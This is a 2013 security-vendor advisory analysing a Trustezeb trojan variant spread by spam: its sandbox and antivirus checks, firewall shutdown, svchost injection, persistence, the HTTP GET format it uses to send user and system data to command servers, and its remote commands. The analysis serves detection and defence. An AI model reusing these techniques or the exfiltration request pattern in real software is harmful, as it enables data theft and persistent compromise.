A new Trustezeb variant spammed in the wild

August 30, 2013

The Dell SonicWall Threats Research team has observed incidents of a new Trustezeb variant being delivered via e-mail spam and drive-by downloads in the wild. The malware executable is compiled in Microsoft Visual C++ and contains two malicious executable embedded in it that gets run on the target machine. The dropped executable sends sensitive information to a remote server and waits for further commands.

Sample e-mail containing the new Trustezeb variant as an attachment:

Infection Cycle:

Upon execution, the Trojan takes a snapshot of the running processes and checks for the presence of Sandboxie environment as well as Avast antivirus program:

The Trojan creates a mutex UACMutexxxxx to mark its presence on the system.

It attempts to stop the Microsoft Windows firewall by running the following command:

The Trojan then creates a new process svchost.exe, injects one of the two embedded executable that it decrypts on runtime, and runs it. The newly created process checks if the parent process is running from %Temp% folder and if the extension of the parent process is .pre. If not, then it drops a copy of the original malware executable into the %Temp% directory as (RandomName).pre and runs it. The infection process cycle can be seen below:

The Trojan creates a registry entry to ensure that it runs on system reboot.

The dropped malware executable that gets injected into svchost.exe, gathers sensitive information on the target machine and reports it back to the Command & Control server in an encrypted form via HTTP GET request. The format of the GET request used by the malware:

    GET /img_cache.php?text=(RANDOMLY GENERATED KEY BLOCK)&img_url=http://(SENSITIVE SYSTEM DATA).(bmp/jpg/png/pcx)&rpt=simage&pos=(INT)

A sample request looks like the following:

The decrypted version of the data being transmitted in above request contains the following information:

    DISKVOLUME_INFO USERNAME:USERID:OPERATING_SYSTEM:SYSTEM_DEFAULT_LANGAUGE_ID:OS_VERSION

A list of hardcoded Command & Control servers extracted during our analysis can be seen below:

The malicious process then waits for commands from the remote server. We saw support for the following commands in the injected code:

  • URLS
  • UPGRADE
  • UPGRADEURL
  • EXECUTE
  • LOAD
  • EXECDLL
  • LOADDLL
  • WAIT
  • KILL
  • MAINER
  • MAINERFILE

Dell SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: Trustezeb.E (Trojan)